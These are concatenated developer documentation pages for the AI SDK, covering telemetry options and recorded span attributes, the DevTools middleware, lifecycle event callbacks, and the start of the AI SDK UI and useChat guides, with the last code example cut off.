Disabling the recording of inputs and outputs can be useful for privacy, data transfer, and performance reasons. You might for example want to disable recording inputs if they contain sensitive information.
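For example, to keep telemetry enabled while omitting the recorded inputs and outputs:

```ts
const result = await generateText({
  model: __MODEL__,
  prompt: 'Write a short story about a cat.',
  experimental_telemetry: {
    isEnabled: true,
    recordInputs: false,
    recordOutputs: false,
  },
});
```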
Telemetry Metadata
You can provide a functionId to identify the function that the telemetry data is for,
and metadata to include additional information in the telemetry data.
const result = await generateText({
model: __MODEL__,
prompt: 'Write a short story about a cat.',
experimental_telemetry: {
isEnabled: true,
functionId: 'my-awesome-function',
metadata: {
something: 'custom',
someOtherThing: 'other-value',
},
},
});
Custom Tracer
You may provide a custom tracer, which must be an OpenTelemetry Tracer. This is useful in situations where you want your traces to use a TracerProvider other than the one provided by the @opentelemetry/api singleton.
import { NodeTracerProvider } from '@opentelemetry/sdk-trace-node';
const tracerProvider = new NodeTracerProvider();
const result = await generateText({
model: __MODEL__,
prompt: 'Write a short story about a cat.',
experimental_telemetry: {
isEnabled: true,
tracer: tracerProvider.getTracer('ai'),
},
});
Telemetry Integrations
Telemetry integrations let you hook into the generation lifecycle to build custom observability — logging, analytics, DevTools, or any other monitoring system. Instead of wiring up individual callbacks on every call, you implement a TelemetryIntegration once and pass it via experimental_telemetry.integrations.
Using an integration
Pass one or more integrations to any generateText or streamText call:
import { streamText } from 'ai';
import { devToolsIntegration } from '@ai-sdk/devtools';
import { openai } from '@ai-sdk/openai';
const result = streamText({
model: openai('gpt-4o'),
prompt: 'Hello!',
experimental_telemetry: {
isEnabled: true,
integrations: [devToolsIntegration()],
},
});
You can combine multiple integrations — they all receive the same lifecycle events:
experimental_telemetry: {
isEnabled: true,
integrations: [devToolsIntegration(), otelIntegration(), customLogger()],
},
Errors inside integrations are caught and do not break the generation flow.
Building a custom integration
Implement the TelemetryIntegration interface from the ai package. All methods are optional — implement only the lifecycle events you care about:
import type { TelemetryIntegration } from 'ai';
import { bindTelemetryIntegration } from 'ai';
class MyIntegration implements TelemetryIntegration {
async onStart(event) {
console.log('Generation started:', event.model.modelId);
}
async onStepFinish(event) {
console.log(
`Step ${event.stepNumber} done:`,
event.usage.totalTokens,
'tokens',
);
}
async onToolCallFinish(event) {
if (event.success) {
console.log(
`Tool "${event.toolCall.toolName}" took ${event.durationMs}ms`,
);
} else {
console.error(`Tool "${event.toolCall.toolName}" failed:`, event.error);
}
}
async onFinish(event) {
console.log('Done. Total tokens:', event.totalUsage.totalTokens);
}
}
export function myIntegration(): TelemetryIntegration {
return bindTelemetryIntegration(new MyIntegration());
}
Use bindTelemetryIntegration for class-based integrations to ensure this is correctly bound when methods are extracted and called as callbacks.
Available lifecycle methods
<PropertiesTable content={[ { name: 'onStart', type: '(event: OnStartEvent) => void | PromiseLike', description: 'Called when the generation operation begins, before any LLM calls.', }, { name: 'onStepStart', type: '(event: OnStepStartEvent) => void | PromiseLike', description: 'Called when a step (LLM call) begins, before the provider is called.', }, { name: 'onToolCallStart', type: '(event: OnToolCallStartEvent) => void | PromiseLike', description: "Called when a tool's execute function is about to run.", }, { name: 'onToolCallFinish', type: '(event: OnToolCallFinishEvent) => void | PromiseLike', description: "Called when a tool's execute function completes or errors.", }, { name: 'onStepFinish', type: '(event: OnStepFinishEvent) => void | PromiseLike', description: 'Called when a step (LLM call) completes.', }, { name: 'onFinish', type: '(event: OnFinishEvent) => void | PromiseLike', description: 'Called when the entire generation completes (all steps finished).', }, ]} />
The event types for each method are the same as the corresponding event callbacks. See the event callbacks documentation for the full property reference of each event.
Collected Data
generateText function
generateText records 3 types of spans:
- ai.generateText (span): the full length of the generateText call. It contains 1 or more ai.generateText.doGenerate spans. It contains the basic LLM span information and the following attributes:
  - operation.name: ai.generateText and the functionId that was set through telemetry.functionId
  - ai.operationId: "ai.generateText"
  - ai.prompt: the prompt that was used when calling generateText
  - ai.response.text: the text that was generated
  - ai.response.toolCalls: the tool calls that were made as part of the generation (stringified JSON)
  - ai.response.finishReason: the reason why the generation finished
  - ai.settings.maxOutputTokens: the maximum number of output tokens that were set
- ai.generateText.doGenerate (span): a provider doGenerate call. It can contain ai.toolCall spans. It contains the call LLM span information and the following attributes:
  - operation.name: ai.generateText.doGenerate and the functionId that was set through telemetry.functionId
  - ai.operationId: "ai.generateText.doGenerate"
  - ai.prompt.messages: the messages that were passed into the provider
  - ai.prompt.tools: array of stringified tool definitions. The tools can be of type function or provider-defined-client. Function tools have a name, description (optional), and inputSchema (JSON schema). Provider-defined-client tools have a name, id, and input (Record).
  - ai.prompt.toolChoice: the stringified tool choice setting (JSON). It has a type property (auto, none, required, tool), and if the type is tool, a toolName property with the specific tool.
  - ai.response.text: the text that was generated
  - ai.response.toolCalls: the tool calls that were made as part of the generation (stringified JSON)
  - ai.response.finishReason: the reason why the generation finished
- ai.toolCall (span): a tool call that is made as part of the generateText call. See Tool call spans for more details.
streamText function
streamText records 3 types of spans and 2 types of events:
- ai.streamText (span): the full length of the streamText call. It contains an ai.streamText.doStream span. It contains the basic LLM span information and the following attributes:
  - operation.name: ai.streamText and the functionId that was set through telemetry.functionId
  - ai.operationId: "ai.streamText"
  - ai.prompt: the prompt that was used when calling streamText
  - ai.response.text: the text that was generated
  - ai.response.toolCalls: the tool calls that were made as part of the generation (stringified JSON)
  - ai.response.finishReason: the reason why the generation finished
  - ai.settings.maxOutputTokens: the maximum number of output tokens that were set
- ai.streamText.doStream (span): a provider doStream call. This span contains an ai.stream.firstChunk event and ai.toolCall spans. It contains the call LLM span information and the following attributes:
  - operation.name: ai.streamText.doStream and the functionId that was set through telemetry.functionId
  - ai.operationId: "ai.streamText.doStream"
  - ai.prompt.messages: the messages that were passed into the provider
  - ai.prompt.tools: array of stringified tool definitions. The tools can be of type function or provider-defined-client. Function tools have a name, description (optional), and inputSchema (JSON schema). Provider-defined-client tools have a name, id, and input (Record).
  - ai.prompt.toolChoice: the stringified tool choice setting (JSON). It has a type property (auto, none, required, tool), and if the type is tool, a toolName property with the specific tool.
  - ai.response.text: the text that was generated
  - ai.response.toolCalls: the tool calls that were made as part of the generation (stringified JSON)
  - ai.response.msToFirstChunk: the time it took to receive the first chunk in milliseconds
  - ai.response.msToFinish: the time it took to receive the finish part of the LLM stream in milliseconds
  - ai.response.avgCompletionTokensPerSecond: the average number of completion tokens per second
  - ai.response.finishReason: the reason why the generation finished
- ai.toolCall (span): a tool call that is made as part of the streamText call. See Tool call spans for more details.
- ai.stream.firstChunk (event): an event that is emitted when the first chunk of the stream is received.
  - ai.response.msToFirstChunk: the time it took to receive the first chunk
- ai.stream.finish (event): an event that is emitted when the finish part of the LLM stream is received.
Deprecated object APIs
If you still run deprecated object APIs, you will see legacy span names:
- generateObject: ai.generateObject, ai.generateObject.doGenerate
- streamObject: ai.streamObject, ai.streamObject.doStream, ai.stream.firstChunk
Legacy object spans include the same core metadata as other LLM spans, plus
object-specific attributes such as ai.schema.*, ai.response.object, and
ai.settings.output.
embed function
embed records 2 types of spans:
- ai.embed (span): the full length of the embed call. It contains 1 ai.embed.doEmbed span. It contains the basic embedding span information and the following attributes:
  - operation.name: ai.embed and the functionId that was set through telemetry.functionId
  - ai.operationId: "ai.embed"
  - ai.value: the value that was passed into the embed function
  - ai.embedding: a JSON-stringified embedding
- ai.embed.doEmbed (span): a provider doEmbed call. It contains the basic embedding span information and the following attributes:
  - operation.name: ai.embed.doEmbed and the functionId that was set through telemetry.functionId
  - ai.operationId: "ai.embed.doEmbed"
  - ai.values: the values that were passed into the provider (array)
  - ai.embeddings: an array of JSON-stringified embeddings
embedMany function
embedMany records 2 types of spans:
- ai.embedMany (span): the full length of the embedMany call. It contains 1 or more ai.embedMany.doEmbed spans. It contains the basic embedding span information and the following attributes:
  - operation.name: ai.embedMany and the functionId that was set through telemetry.functionId
  - ai.operationId: "ai.embedMany"
  - ai.values: the values that were passed into the embedMany function
  - ai.embeddings: an array of JSON-stringified embeddings
- ai.embedMany.doEmbed (span): a provider doEmbed call. It contains the basic embedding span information and the following attributes:
  - operation.name: ai.embedMany.doEmbed and the functionId that was set through telemetry.functionId
  - ai.operationId: "ai.embedMany.doEmbed"
  - ai.values: the values that were sent to the provider
  - ai.embeddings: an array of JSON-stringified embeddings for each value
Span Details
Basic LLM span information
Many spans that use LLMs (ai.generateText, ai.generateText.doGenerate, ai.streamText, ai.streamText.doStream) contain the following attributes:
- resource.name: the functionId that was set through telemetry.functionId
- ai.model.id: the id of the model
- ai.model.provider: the provider of the model
- ai.request.headers.*: the request headers that were passed in through headers
- ai.response.providerMetadata: provider specific metadata returned with the generation response
- ai.settings.maxRetries: the maximum number of retries that were set
- ai.telemetry.functionId: the functionId that was set through telemetry.functionId
- ai.telemetry.metadata.*: the metadata that was passed in through telemetry.metadata
- ai.usage.completionTokens: the number of completion tokens that were used
- ai.usage.promptTokens: the number of prompt tokens that were used
Call LLM span information
Spans that correspond to individual LLM calls (ai.generateText.doGenerate, ai.streamText.doStream) contain
basic LLM span information and the following attributes:
- ai.response.model: the model that was used to generate the response. This can be different from the model that was requested if the provider supports aliases.
- ai.response.id: the id of the response. Uses the ID from the provider when available.
- ai.response.timestamp: the timestamp of the response. Uses the timestamp from the provider when available.
- Semantic Conventions for GenAI operations:
  - gen_ai.system: the provider that was used
  - gen_ai.request.model: the model that was requested
  - gen_ai.request.temperature: the temperature that was set
  - gen_ai.request.max_tokens: the maximum number of tokens that were set
  - gen_ai.request.frequency_penalty: the frequency penalty that was set
  - gen_ai.request.presence_penalty: the presence penalty that was set
  - gen_ai.request.top_k: the topK parameter value that was set
  - gen_ai.request.top_p: the topP parameter value that was set
  - gen_ai.request.stop_sequences: the stop sequences
  - gen_ai.response.finish_reasons: the finish reasons that were returned by the provider
  - gen_ai.response.model: the model that was used to generate the response. This can be different from the model that was requested if the provider supports aliases.
  - gen_ai.response.id: the id of the response. Uses the ID from the provider when available.
  - gen_ai.usage.input_tokens: the number of prompt tokens that were used
  - gen_ai.usage.output_tokens: the number of completion tokens that were used
Basic embedding span information
Many spans that use embedding models (ai.embed, ai.embed.doEmbed, ai.embedMany, ai.embedMany.doEmbed) contain the following attributes:
- ai.model.id: the id of the model
- ai.model.provider: the provider of the model
- ai.request.headers.*: the request headers that were passed in through headers
- ai.settings.maxRetries: the maximum number of retries that were set
- ai.telemetry.functionId: the functionId that was set through telemetry.functionId
- ai.telemetry.metadata.*: the metadata that was passed in through telemetry.metadata
- ai.usage.tokens: the number of tokens that were used
- resource.name: the functionId that was set through telemetry.functionId
Tool call spans
Tool call spans (ai.toolCall) contain the following attributes:
- operation.name: "ai.toolCall"
- ai.operationId: "ai.toolCall"
- ai.toolCall.name: the name of the tool
- ai.toolCall.id: the id of the tool call
- ai.toolCall.args: the input parameters of the tool call
- ai.toolCall.result: the output result of the tool call. Only available if the tool call is successful and the result is serializable.
title: DevTools description: Debug and inspect AI SDK applications with DevTools
DevTools
AI SDK DevTools gives you full visibility into your AI SDK calls made with generateText, streamText, and ToolLoopAgent. It helps you debug and inspect LLM requests, responses, tool calls, and multi-step interactions through a web-based UI.
DevTools is composed of two parts:
- Middleware: Captures runs and steps from your AI SDK calls
- Viewer: A web UI to inspect the captured data
Installation
Install the DevTools package:
pnpm add @ai-sdk/devtools
Requirements
- AI SDK v6 beta (ai@^6.0.0-beta.0)
- Node.js compatible runtime
Using DevTools
Add the middleware
Wrap your language model with the DevTools middleware using wrapLanguageModel:
import { wrapLanguageModel, gateway } from 'ai';
import { devToolsMiddleware } from '@ai-sdk/devtools';
const model = wrapLanguageModel({
model: gateway('anthropic/claude-sonnet-4.5'),
middleware: devToolsMiddleware(),
});
The wrapped model can be used with any AI SDK Core function:
import { generateText } from 'ai';
const result = await generateText({
model, // wrapped model with DevTools
prompt: 'What cities are in the United States?',
});
Launch the viewer
Start the DevTools viewer:
npx @ai-sdk/devtools
Open http://localhost:4983 to view your AI SDK interactions.
Monorepo usage
If you are using a monorepo setup (e.g. Turborepo, Nx), start DevTools from the same workspace where your AI SDK code runs.
For example, if your API is in apps/api, run:
cd apps/api
npx @ai-sdk/devtools
Captured data
The DevTools middleware captures the following information from your AI SDK calls:
- Input parameters and prompts: View the complete input sent to your LLM
- Output content and tool calls: Inspect generated text and tool invocations
- Token usage and timing: Monitor resource consumption and performance
- Raw provider data: Access complete request and response payloads
Runs and steps
DevTools organizes captured data into runs and steps:
- Run: A complete multi-step AI interaction, grouped by the initial prompt
- Step: A single LLM call within a run (e.g., one generateText or streamText call)
Multi-step interactions, such as those created by tool calling or agent loops, are grouped together as a single run with multiple steps.
How it works
The DevTools middleware intercepts all generateText and streamText calls through the language model middleware system. Captured data is stored locally in a JSON file (.devtools/generations.json) and served through a web UI built with Hono and React.
Security considerations
DevTools stores all AI interactions locally in plain text files, including:
- User prompts and messages
- LLM responses
- Tool call arguments and results
- API request and response data
Only use DevTools in local development environments. Do not enable DevTools in production or when handling sensitive data.
title: Event Callbacks description: Subscribe to lifecycle events in generateText and streamText calls
Event Callbacks
The AI SDK provides per-call event callbacks that you can pass to generateText and streamText to observe lifecycle events. This is useful for building observability tools, logging systems, analytics, and debugging utilities.
Basic Usage
Pass callbacks directly to generateText or streamText:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const result = await generateText({
model: openai('gpt-4o'),
prompt: 'What is the weather in San Francisco?',
experimental_onStart: event => {
console.log('Generation started:', event.model.modelId);
},
onFinish: event => {
console.log('Generation finished:', event.totalUsage);
},
});
Available Callbacks
<PropertiesTable content={[ { name: 'experimental_onStart', type: '(event: OnStartEvent) => void | Promise', description: 'Called when generation begins, before any LLM calls.', }, { name: 'experimental_onStepStart', type: '(event: OnStepStartEvent) => void | Promise', description: 'Called when a step (LLM call) begins, before the provider is called.', }, { name: 'experimental_onToolCallStart', type: '(event: OnToolCallStartEvent) => void | Promise', description: "Called when a tool's execute function is about to run.", }, { name: 'experimental_onToolCallFinish', type: '(event: OnToolCallFinishEvent) => void | Promise', description: "Called when a tool's execute function completes or errors.", }, { name: 'onStepFinish', type: '(event: OnStepFinishEvent) => void | Promise', description: 'Called when a step (LLM call) completes.', }, { name: 'onFinish', type: '(event: OnFinishEvent) => void | Promise', description: 'Called when the entire generation completes (all steps finished).', }, ]} />
Event Reference
experimental_onStart
Called when the generation operation begins, before any LLM calls are made.
const result = await generateText({
model: openai('gpt-4o'),
prompt: 'Hello!',
experimental_onStart: event => {
console.log('Model:', event.model.modelId);
console.log('Temperature:', event.temperature);
},
});
<PropertiesTable content={[ { name: 'model', type: '{ provider: string; modelId: string }', description: 'The model being used for generation.', }, { name: 'system', type: 'string | SystemModelMessage | Array | undefined', description: 'The system message(s) provided to the model.', }, { name: 'prompt', type: 'string | Array | undefined', description: 'The prompt string or array of messages if using the prompt option.', }, { name: 'messages', type: 'Array | undefined', description: 'The messages array if using the messages option.', }, { name: 'tools', type: 'ToolSet | undefined', description: 'The tools available for this generation.', }, { name: 'toolChoice', type: 'ToolChoice | undefined', description: 'The tool choice strategy for this generation.', }, { name: 'activeTools', type: 'Array | undefined', description: 'Limits which tools are available for the model to call.', }, { name: 'maxOutputTokens', type: 'number | undefined', description: 'Maximum number of tokens to generate.', }, { name: 'temperature', type: 'number | undefined', description: 'Sampling temperature for generation.', }, { name: 'topP', type: 'number | undefined', description: 'Top-p (nucleus) sampling parameter.', }, { name: 'topK', type: 'number | undefined', description: 'Top-k sampling parameter.', }, { name: 'presencePenalty', type: 'number | undefined', description: 'Presence penalty for generation.', }, { name: 'frequencyPenalty', type: 'number | undefined', description: 'Frequency penalty for generation.', }, { name: 'stopSequences', type: 'string[] | undefined', description: 'Sequences that will stop generation.', }, { name: 'seed', type: 'number | undefined', description: 'Random seed for reproducible generation.', }, { name: 'maxRetries', type: 'number', description: 'Maximum number of retries for failed requests.', }, { name: 'timeout', type: 'TimeoutConfiguration | undefined', description: 'Timeout configuration for the generation.', }, { name: 'headers', type: 'Record<string, string | undefined> | undefined', description: 'Additional HTTP headers sent with the request.', }, { name: 'providerOptions', type: 'ProviderOptions | undefined', description: 'Additional provider-specific options.', }, { name: 'stopWhen', type: 'StopCondition | Array | undefined', description: 'Condition(s) for stopping the generation.', }, { name: 'output', type: 'Output | undefined', description: 'The output specification for structured outputs.', }, { name: 'abortSignal', type: 'AbortSignal | undefined', description: 'Abort signal for cancelling the operation.', }, { name: 'include', type: '{ requestBody?: boolean; responseBody?: boolean } | undefined', description: 'Settings for controlling what data is included in step results.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, { name: 'metadata', type: 'Record<string, unknown> | undefined', description: 'Additional metadata passed to the generation.', }, { name: 'experimental_context', type: 'unknown', description: 'User-defined context object that flows through the entire generation lifecycle.', }, ]} />
experimental_onStepStart
Called before each step (LLM call) begins. Useful for tracking multi-step generations.
const result = await generateText({
model: openai('gpt-4o'),
prompt: 'Hello!',
experimental_onStepStart: event => {
console.log('Step:', event.stepNumber);
console.log('Messages:', event.messages.length);
},
});
<PropertiesTable content={[ { name: 'stepNumber', type: 'number', description: 'Zero-based index of the current step.', }, { name: 'model', type: '{ provider: string; modelId: string }', description: 'The model being used for this step.', }, { name: 'system', type: 'string | SystemModelMessage | Array | undefined', description: 'The system message for this step.', }, { name: 'messages', type: 'Array', description: 'The messages that will be sent to the model for this step.', }, { name: 'tools', type: 'ToolSet | undefined', description: 'The tools available for this generation.', }, { name: 'toolChoice', type: 'LanguageModelV3ToolChoice | undefined', description: 'The tool choice configuration for this step.', }, { name: 'activeTools', type: 'Array | undefined', description: 'Limits which tools are available for this step.', }, { name: 'steps', type: 'ReadonlyArray', description: 'Array of results from previous steps (empty for first step).', }, { name: 'providerOptions', type: 'ProviderOptions | undefined', description: 'Additional provider-specific options for this step.', }, { name: 'timeout', type: 'TimeoutConfiguration | undefined', description: 'Timeout configuration for the generation.', }, { name: 'headers', type: 'Record<string, string | undefined> | undefined', description: 'Additional HTTP headers sent with the request.', }, { name: 'stopWhen', type: 'StopCondition | Array | undefined', description: 'Condition(s) for stopping the generation.', }, { name: 'output', type: 'Output | undefined', description: 'The output specification for structured outputs.', }, { name: 'abortSignal', type: 'AbortSignal | undefined', description: 'Abort signal for cancelling the operation.', }, { name: 'include', type: '{ requestBody?: boolean; responseBody?: boolean } | undefined', description: 'Settings for controlling what data is included in step results.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, { name: 'metadata', type: 'Record<string, unknown> | undefined', description: 'Additional metadata from telemetry settings.', }, { name: 'experimental_context', type: 'unknown', description: 'User-defined context object. May be updated from prepareStep between steps.', }, ]} />
experimental_onToolCallStart
Called before a tool's execute function runs.
const result = await generateText({
model: openai('gpt-4o'),
prompt: 'What is the weather?',
tools: { getWeather },
experimental_onToolCallStart: event => {
console.log('Tool:', event.toolCall.toolName);
console.log('Input:', event.toolCall.input);
},
});
<PropertiesTable content={[ { name: 'stepNumber', type: 'number | undefined', description: 'Zero-based index of the current step where this tool call occurs.', }, { name: 'model', type: '{ provider: string; modelId: string } | undefined', description: 'The model being used for this step.', }, { name: 'toolCall', type: 'TypedToolCall', description: 'The full tool call object.', properties: [ { type: 'TypedToolCall', parameters: [ { name: 'type', type: "'tool-call'", description: 'The type of the call.', }, { name: 'toolCallId', type: 'string', description: 'Unique identifier for this tool call.', }, { name: 'toolName', type: 'string', description: 'Name of the tool being called.', }, { name: 'input', type: 'unknown', description: 'Input arguments passed to the tool.', }, ], }, ], }, { name: 'messages', type: 'Array', description: 'The conversation messages available at tool execution time.', }, { name: 'abortSignal', type: 'AbortSignal | undefined', description: 'Signal for cancelling the operation.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, { name: 'metadata', type: 'Record<string, unknown> | undefined', description: 'Additional metadata from telemetry settings.', }, { name: 'experimental_context', type: 'unknown', description: 'User-defined context object flowing through the generation.', }, ]} />
experimental_onToolCallFinish
Called after a tool's execute function completes or errors. Uses a discriminated union on the success field.
const result = await generateText({
model: openai('gpt-4o'),
prompt: 'What is the weather?',
tools: { getWeather },
experimental_onToolCallFinish: event => {
console.log('Tool:', event.toolCall.toolName);
console.log('Duration:', event.durationMs, 'ms');
if (event.success) {
console.log('Output:', event.output);
} else {
console.error('Error:', event.error);
}
},
});
<PropertiesTable content={[ { name: 'stepNumber', type: 'number | undefined', description: 'Zero-based index of the current step where this tool call occurred.', }, { name: 'model', type: '{ provider: string; modelId: string } | undefined', description: 'The model being used for this step.', }, { name: 'toolCall', type: 'TypedToolCall', description: 'The full tool call object.', properties: [ { type: 'TypedToolCall', parameters: [ { name: 'type', type: "'tool-call'", description: 'The type of the call.', }, { name: 'toolCallId', type: 'string', description: 'Unique identifier for this tool call.', }, { name: 'toolName', type: 'string', description: 'Name of the tool that was called.', }, { name: 'input', type: 'unknown', description: 'Input arguments passed to the tool.', }, ], }, ], }, { name: 'messages', type: 'Array', description: 'The conversation messages available at tool execution time.', }, { name: 'abortSignal', type: 'AbortSignal | undefined', description: 'Signal for cancelling the operation.', }, { name: 'durationMs', type: 'number', description: 'Execution time of the tool call in milliseconds.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, { name: 'metadata', type: 'Record<string, unknown> | undefined', description: 'Additional metadata from telemetry settings.', }, { name: 'experimental_context', type: 'unknown', description: 'User-defined context object flowing through the generation.', }, { name: 'success', type: 'boolean', description: 'Discriminator indicating whether the tool call succeeded. When true, output is available. When false, error is available.', }, { name: 'output', type: 'unknown', description: "The tool's return value (only present when success is true).", }, { name: 'error', type: 'unknown', description: 'The error that occurred during tool execution (only present when success is false).', }, ]} />
onStepFinish
Called after each step (LLM call) completes. Provides the full StepResult.
const result = await generateText({
model: openai('gpt-4o'),
prompt: 'Hello!',
onStepFinish: event => {
console.log('Step:', event.stepNumber);
console.log('Finish reason:', event.finishReason);
console.log('Tokens:', event.usage.totalTokens);
},
});
<PropertiesTable content={[ { name: 'stepNumber', type: 'number', description: 'Zero-based index of this step.', }, { name: 'model', type: '{ provider: string; modelId: string }', description: 'Information about the model that produced this step.', }, { name: 'finishReason', type: "'stop' | 'length' | 'content-filter' | 'tool-calls' | 'error' | 'other'", description: 'The unified reason why the generation finished.', }, { name: 'usage', type: 'LanguageModelUsage', description: 'The token usage of the generated text.', properties: [ { type: 'LanguageModelUsage', parameters: [ { name: 'inputTokens', type: 'number | undefined', description: 'The total number of input (prompt) tokens used.', }, { name: 'outputTokens', type: 'number | undefined', description: 'The number of output (completion) tokens used.', }, { name: 'totalTokens', type: 'number | undefined', description: 'The total number of tokens used.', }, ], }, ], }, { name: 'text', type: 'string', description: 'The generated text.', }, { name: 'toolCalls', type: 'Array', description: 'The tool calls that were made during the generation.', }, { name: 'toolResults', type: 'Array', description: 'The results of the tool calls.', }, { name: 'content', type: 'Array', description: 'The content that was generated in this step.', }, { name: 'reasoning', type: 'Array', description: 'The reasoning that was generated during the generation.', }, { name: 'reasoningText', type: 'string | undefined', description: 'The reasoning text that was generated.', }, { name: 'files', type: 'Array', description: 'The files that were generated during the generation.', }, { name: 'sources', type: 'Array', description: 'The sources that were used to generate the text.', }, { name: 'warnings', type: 'CallWarning[] | undefined', description: 'Warnings from the model provider.', }, { name: 'request', type: 'LanguageModelRequestMetadata', description: 'Additional request information.', }, { name: 'response', type: 'LanguageModelResponseMetadata', description: 'Additional response information including id, modelId, timestamp, headers, and messages.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, { name: 'metadata', type: 'Record<string, unknown> | undefined', description: 'Additional metadata from telemetry settings.', }, { name: 'experimental_context', type: 'unknown', description: 'User-defined context object flowing through the generation.', }, { name: 'providerMetadata', type: 'ProviderMetadata | undefined', description: 'Additional provider-specific metadata.', }, ]} />
onFinish
Called when the entire generation completes (all steps finished). Includes aggregated data.
const result = await generateText({
model: openai('gpt-4o'),
prompt: 'Hello!',
onFinish: event => {
console.log('Total steps:', event.steps.length);
console.log('Total tokens:', event.totalUsage.totalTokens);
console.log('Final text:', event.text);
},
});
<PropertiesTable content={[ { name: 'steps', type: 'Array', description: 'Array containing results from all steps in the generation.', }, { name: 'totalUsage', type: 'LanguageModelUsage', description: 'Aggregated token usage across all steps.', properties: [ { type: 'LanguageModelUsage', parameters: [ { name: 'inputTokens', type: 'number | undefined', description: 'The total number of input tokens used across all steps.', }, { name: 'outputTokens', type: 'number | undefined', description: 'The total number of output tokens used across all steps.', }, { name: 'totalTokens', type: 'number | undefined', description: 'The total number of tokens used across all steps.', }, ], }, ], }, { name: 'stepNumber', type: 'number', description: 'Zero-based index of the final step.', }, { name: 'model', type: '{ provider: string; modelId: string }', description: 'Information about the model that produced the final step.', }, { name: 'finishReason', type: "'stop' | 'length' | 'content-filter' | 'tool-calls' | 'error' | 'other'", description: 'The unified reason why the generation finished.', }, { name: 'usage', type: 'LanguageModelUsage', description: 'The token usage from the final step only (not aggregated).', }, { name: 'text', type: 'string', description: 'The full text that has been generated.', }, { name: 'toolCalls', type: 'Array', description: 'The tool calls that were made in the final step.', }, { name: 'toolResults', type: 'Array', description: 'The results of the tool calls from the final step.', }, { name: 'content', type: 'Array', description: 'The content that was generated in the final step.', }, { name: 'reasoning', type: 'Array', description: 'The reasoning that was generated.', }, { name: 'reasoningText', type: 'string | undefined', description: 'The reasoning text that was generated.', }, { name: 'files', type: 'Array', description: 'Files that were generated in the final step.', }, { name: 'sources', type: 'Array', description: 'Sources that have been used as input to generate the response.', }, { name: 'warnings', type: 'CallWarning[] | undefined', description: 'Warnings from the model provider.', }, { name: 'request', type: 'LanguageModelRequestMetadata', description: 'Additional request information from the final step.', }, { name: 'response', type: 'LanguageModelResponseMetadata', description: 'Additional response information from the final step.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, { name: 'metadata', type: 'Record<string, unknown> | undefined', description: 'Additional metadata from telemetry settings.', }, { name: 'experimental_context', type: 'unknown', description: 'The final state of the user-defined context object.', }, { name: 'providerMetadata', type: 'ProviderMetadata | undefined', description: 'Additional provider-specific metadata from the final step.', }, ]} />
Use Cases
Logging and Debugging
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-4o'),
prompt: 'Hello!',
experimental_onStart: event => {
console.log(`[${new Date().toISOString()}] Generation started`, {
model: event.model.modelId,
provider: event.model.provider,
});
},
onStepFinish: event => {
console.log(
`[${new Date().toISOString()}] Step ${event.stepNumber} finished`,
{
finishReason: event.finishReason,
tokens: event.usage.totalTokens,
},
);
},
onFinish: event => {
console.log(`[${new Date().toISOString()}] Generation complete`, {
totalSteps: event.steps.length,
totalTokens: event.totalUsage.totalTokens,
});
},
});
Tool Execution Monitoring
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-4o'),
prompt: 'What is the weather?',
tools: { getWeather },
experimental_onToolCallStart: event => {
console.log(`Tool "${event.toolCall.toolName}" starting...`);
},
experimental_onToolCallFinish: event => {
if (event.success) {
console.log(
`Tool "${event.toolCall.toolName}" completed in ${event.durationMs}ms`,
);
} else {
console.error(`Tool "${event.toolCall.toolName}" failed:`, event.error);
}
},
});
Error Handling
Errors thrown inside callbacks are caught and do not break the generation flow. This ensures that monitoring code cannot disrupt your application:
const result = await generateText({
model: openai('gpt-4o'),
prompt: 'Hello!',
experimental_onStart: () => {
// This error is caught internally; generation continues normally
throw new Error('This error is caught internally');
},
});
title: Overview
description: An overview of AI SDK UI.
AI SDK UI
AI SDK UI is designed to help you build interactive chat, completion, and assistant applications with ease. It is a framework-agnostic toolkit, streamlining the integration of advanced AI functionalities into your applications.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently. With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
- useChat offers real-time streaming of chat messages, abstracting state management for inputs, messages, loading, and errors, allowing for seamless integration into any UI design.
- useCompletion enables you to handle text completions in your applications, managing the prompt input and automatically updating the UI as new completions are streamed.
- useObject is a hook that allows you to consume streamed JSON objects, providing a simple way to handle and display structured data in your application.
These hooks are designed to reduce the complexity and time required to implement AI interactions, letting you focus on creating exceptional user experiences.
UI Framework Support
AI SDK UI supports the following frameworks: React, Svelte, Vue.js, Angular, and SolidJS.
Here is a comparison of the supported functions across these frameworks:
| Framework | useChat | useCompletion | useObject |
|---|---|---|---|
| React (@ai-sdk/react) | ✓ | ✓ | ✓ |
| Vue.js (@ai-sdk/vue) | ✓ | ✓ | ✓ |
| Svelte (@ai-sdk/svelte) | Chat | Completion | StructuredObject |
| Angular (@ai-sdk/angular) | Chat | Completion | StructuredObject |

SolidJS support is available as a community package.
Framework Examples
Explore these example implementations for different frameworks:
API Reference
Please check out the AI SDK UI API Reference for more details on each function.
title: Chatbot
description: Learn how to use the useChat hook.
Chatbot
The useChat hook makes it effortless to create a conversational user interface for your chatbot application. It enables the streaming of chat messages from your AI provider, manages the chat state, and updates the UI automatically as new messages arrive.
To summarize, the useChat hook provides the following features:
- Message Streaming: All the messages from the AI provider are streamed to the chat UI in real-time.
- Managed States: The hook manages the states for input, messages, status, error and more for you.
- Seamless Integration: Easily integrate your chat AI into any design or layout with minimal effort.
In this guide, you will learn how to use the useChat hook to create a chatbot application with real-time message streaming.
Check out our chatbot with tools guide to learn how to use tools in your chatbot.
Let's start with the following example first.
Example
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';
export default function Page() {
const { messages, sendMessage, status } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
